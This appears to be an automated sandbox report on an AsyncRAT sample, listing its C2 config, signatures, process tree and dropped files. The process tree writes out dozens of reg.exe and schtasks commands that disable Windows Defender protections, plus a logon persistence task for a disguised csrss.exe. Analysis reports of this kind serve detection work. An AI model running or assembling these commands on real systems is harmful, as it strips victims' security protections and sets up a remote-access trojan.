Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

28/06/2024, 21:31

240628-1dj7rswanm 10

28/06/2024, 21:30

240628-1cwjeasfjf 10

28/06/2024, 21:23

240628-z8y4qssdrg 10

28/06/2024, 21:14

240628-z3lw8avfpn 10

Analysis

  • max time kernel
    152s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/06/2024, 21:31

General

  • Target

    test.exe

  • Size

    101KB

  • MD5

    8eab3abc6963ebf4446c5e5aa559f1d4

  • SHA1

    5901818505035554b05204b2575aebfcde196d35

  • SHA256

    d01b020acbaee9457d161a79b852932cc192a2dde3d47ac14292eab667aee068

  • SHA512

    d55786d83c067fbe8d39537496979b3a3fb92ee87b16f39caa0795c9eef1eb7d354636058569c870a93e8f1888c6f3ee5e75d978dda9b31ae062de47fb306432

  • SSDEEP

    3072:gvGyYiSDnt1lD5ScJk3sVkwqAOOwOfHQ:E41YCQ/lhVOfw

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

127.0.0.1:8848

185.188.183.18:8848

Mutex

DbNvcWoLvbqX

Attributes
  • delay

    1

  • install

    true

  • install_file

    csrss.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 3 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Async RAT payload 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\test.exe
    "C:\Users\Admin\AppData\Local\Temp\test.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3544
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c main.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3876
      • C:\Windows\system32\openfiles.exe
        openfiles
        3⤵
          PID:4984
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
          3⤵
          • Modifies Windows Defender notification settings
          PID:3948
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
          3⤵
            PID:4992
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
            3⤵
              PID:3568
            • C:\Windows\system32\reg.exe
              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
              3⤵
                PID:2296
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
                3⤵
                  PID:1856
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                  3⤵
                    PID:1992
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                    3⤵
                      PID:1952
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
                      3⤵
                        PID:4040
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
                        3⤵
                          PID:4320
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                          3⤵
                            PID:4696
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                            3⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:1204
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                            3⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:924
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                            3⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:2568
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                            3⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:3548
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
                            3⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:2228
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            3⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:3264
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                            3⤵
                              PID:5604
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                              3⤵
                                PID:5412
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                3⤵
                                  PID:5444
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                  3⤵
                                    PID:5556
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                    3⤵
                                      PID:5404
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      3⤵
                                        PID:5760
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                        3⤵
                                          PID:5628
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                          3⤵
                                            PID:5772
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                            3⤵
                                              PID:2616
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                              3⤵
                                                PID:5352
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                3⤵
                                                  PID:5328
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                  3⤵
                                                    PID:5348
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                    3⤵
                                                      PID:5372
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                      3⤵
                                                        PID:5516
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                        3⤵
                                                          PID:1152
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                          3⤵
                                                            PID:4408
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                            3⤵
                                                              PID:4608
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                              3⤵
                                                                PID:4476
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                3⤵
                                                                  PID:3144
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                  3⤵
                                                                    PID:1796
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                    3⤵
                                                                    • Modifies security service
                                                                    PID:4860
                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dllhost.exe
                                                                    dllhost.exe
                                                                    3⤵
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    PID:464
                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                                                      4⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:6028
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"' & exit
                                                                        5⤵
                                                                          PID:2324
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"'
                                                                            6⤵
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:3948
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8122.tmp.bat""
                                                                          5⤵
                                                                            PID:4916
                                                                            • C:\Windows\system32\timeout.exe
                                                                              timeout 3
                                                                              6⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:4700
                                                                            • C:\Users\Admin\AppData\Roaming\csrss.exe
                                                                              "C:\Users\Admin\AppData\Roaming\csrss.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5608
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe"
                                                                    1⤵
                                                                      PID:5396
                                                                      • C:\Windows\system32\curl.exe
                                                                        curl api.ipify.org
                                                                        2⤵
                                                                          PID:2088
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4004 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
                                                                        1⤵
                                                                          PID:6096

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v15

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dllhost.exe

                                                                          Filesize

                                                                          90KB

                                                                          MD5

                                                                          f75acc31206c792c4831f9aa52404b2b

                                                                          SHA1

                                                                          c1380e151eba78a3ec395f46d76fbcd273c10afe

                                                                          SHA256

                                                                          7aaa38f2e289da72c6dc9b61d4951f34badc693798560f69ad42944eb470dbfd

                                                                          SHA512

                                                                          80614ccd2823c429867a421ca0464ed088f474c2399681be398982a440112fa1683680a2f4cf496bec98f23792ea5a74ece95fd0741499b9389a98ab72c5a72f

                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\main.bat

                                                                          Filesize

                                                                          4KB

                                                                          MD5

                                                                          ea021e4f2f77ebf4e02a39c82172e240

                                                                          SHA1

                                                                          98f921e1b0d0a1273fb1c9e9dcf6245cbd92c91a

                                                                          SHA256

                                                                          c7c390518a2d06e2567eca287925058bcb8bc466cffe4c210fec0f9664f5bcde

                                                                          SHA512

                                                                          7f201842a37cd57751d800a950beb5369e010f6dae34b6241db1b9e3b64c86bfe30c2116039a0f8a80bc79bd8371dd707140a9fe564e6468c4accb1eb3861d65

                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost.exe

                                                                          Filesize

                                                                          48KB

                                                                          MD5

                                                                          ee7346d7b4db0921b8e859072b561514

                                                                          SHA1

                                                                          6c0ccc2bab163fdabe93d9e7ae5a6d723a422709

                                                                          SHA256

                                                                          7ef4770b47759c0b35cf97edca41ff0d6a61265a4cf910e7454b46a915218deb

                                                                          SHA512

                                                                          a1e04022702df848dad96ec28cb91fc9515b0ea03b1ed7f93deb8001e9a2efe4b49ac4ce848679cb591faf45505db6716cb5afe60f7754ba7a96d52cf595833f

                                                                        • C:\Users\Admin\AppData\Local\Temp\tmp8122.tmp.bat

                                                                          Filesize

                                                                          149B

                                                                          MD5

                                                                          2597ac3c85981bf316f13034b441e0a8

                                                                          SHA1

                                                                          50bc2ff44a804f0eb4355fb434a35fa1d626e2f2

                                                                          SHA256

                                                                          3e9833c3e4c4157415e90fccb704132b71a01e6360b96fcdaac0b15e7582630c

                                                                          SHA512

                                                                          5eed20ab9f074cafd15bf59439ba77b29b488065f33b3dad28cbaa953d8a420bc87c9616ccc54b31ed42c4d6d65932633d9f253d91904c861dd46e83a70c8ca4

                                                                        • memory/464-8-0x0000000000400000-0x000000000041D000-memory.dmp

                                                                          Filesize

                                                                          116KB

                                                                        • memory/464-12-0x0000000000400000-0x000000000041D000-memory.dmp

                                                                          Filesize

                                                                          116KB

                                                                        • memory/464-23-0x0000000000400000-0x000000000041D000-memory.dmp

                                                                          Filesize

                                                                          116KB

                                                                        • memory/5608-34-0x000000001DEB0000-0x000000001DF26000-memory.dmp

                                                                          Filesize

                                                                          472KB

                                                                        • memory/5608-35-0x000000001D890000-0x000000001D8A0000-memory.dmp

                                                                          Filesize

                                                                          64KB

                                                                        • memory/5608-36-0x000000001DE80000-0x000000001DE9E000-memory.dmp

                                                                          Filesize

                                                                          120KB

                                                                        • memory/5608-37-0x000000001D9F0000-0x000000001D9FE000-memory.dmp

                                                                          Filesize

                                                                          56KB

                                                                        • memory/6028-22-0x0000000000750000-0x0000000000762000-memory.dmp

                                                                          Filesize

                                                                          72KB